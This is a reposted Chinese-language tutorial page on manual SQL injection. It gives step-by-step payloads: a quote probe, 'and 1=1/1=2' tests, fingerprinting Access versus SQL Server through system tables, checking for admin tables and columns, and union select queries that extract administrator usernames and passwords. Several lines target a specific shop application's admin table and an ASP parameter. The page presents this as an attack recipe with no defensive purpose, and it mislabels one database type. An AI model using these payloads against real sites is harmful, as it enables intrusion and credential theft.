Home > Database > Mysql Tutorial > body text

检测有没有注入点:

WBOY
Release: 2016-06-07 15:10:52
Original
1349 people have browsed it

检测 有没有 注入 点: 直接加一个'号,返回错误页初步断定有漏洞! 然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞!然后查什么数据库! 代码: and (select count (*) from sysobjects)=0 返回错误说明是Access数据库 因为Access没有sysobject

 

检测有没有注入点:
直接加一个'号,返回错误页初步断定有漏洞!
然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞!然后查什么数据库!
代码: and (select count (*) from sysobjects)>=0 返回错误说明是Access数据库 因为Access没有sysobjects系统表!

如果返回正常那就打下面的代码:
and (select count (*) from msysobjects)>=0 如果返回错误 说明是 mysql数据库 因为 sql server没有msysobjects系统表!

之后查询没有没有admin表,代码:
and exists(select * from admin) 返回正常说明有admin表 返回错误说明没有!

然后查询admin表有没有admin,password两个字段!代码:
and exists(select admin from admin) 返回正常说明有! 错误则没有!
and exists(select password from admin) 返回正常说明有! 错误则没有!
最后联合查询
order by 查该页面共有多少字段
union select 1,2,3,4,5,6,........n from admin 查账户名和密码的字段 位置

TEXTBOX2.ASP?action=modify&newsi%64=

shopxp_admin
and exists(select * from shopxp_admin)
and exists(select admin from shopxp_admin)

union select 1,2,admin,4,5,6,7 from shopxp_admin

union select 1,2,password,4,5,6,7 from shopxp_admin

and exists(select admin from shopxp_admin)

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template